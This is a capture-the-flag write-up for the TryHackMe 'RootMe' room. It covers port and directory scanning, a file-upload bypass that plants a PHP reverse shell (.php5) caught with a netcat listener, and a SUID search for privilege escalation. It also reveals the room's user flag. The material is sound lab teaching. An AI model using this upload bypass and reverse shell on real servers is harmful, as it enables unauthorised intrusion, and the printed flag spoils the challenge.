Challenges: RootMe (TryHackMe)

This article will cover the RootMe write-up under Challenges on THM.

Deploy the machine

Connect to the TryHackMe network and deploy the machine. If you don't know how to do this, complete the OpenVPN room first.

First, let's get information about the target.

Scan the machine, how many ports are open? 2

nmap -p- <ip_address>
What version of Apache is running? 2.4.29
curl http://<ip_address>/http

Other command options to find the version of Apache running:
curl -I <ip_address>

nmap -sV -p 80,8080 <target-ip>

nikto -h http://<IP>
What service is running on port 22? ssh
Find directories on the web server using the GoBuster tool.

gobuster dir -u <ip_address> -w /usr/share/wordlists/dirb/common.txt
What is the hidden directory? /panel/

to check other files:

gobuster dir -u http://<ip_address> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

Find a form to upload and get a reverse shell, and find the flag.

user.txt - The hint: Search for "file upload bypass" and "PHP reverse shell".

THM{y0u_g0t_a_sh3ll}

Copy the /usr/share/webshells/php/php-reverse-shell.php file into a new file, e.g, shell.php5

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php5

$ nc -lvnp 4444 // on a different tab

Change the IP_Address to match the attack box IP, and also change the port to match the port you’ve started to listen on
Visit the http://ip_address/panel Then upload the shell.php5
If you upload a .PHP file, an alert ‘PHP not allowed’ will pop up, and if it’s a .png or .jpg file, is upload success alert will show, but it won’t open or reverse the shell. They php5 will reverse the shell. Under the $ nc -lvnp 4444 tab and you’ll be able to access the user.txt file, which has the flag
Check the tab that has nc -lvnp 4444, and the shell has been reversed

$ find / -type f -name user.txt 2> /dev/null

$ cat /var/www/user.txt

Now that we have a shell, let's escalate our privileges to root.

find / -user root -perm /4000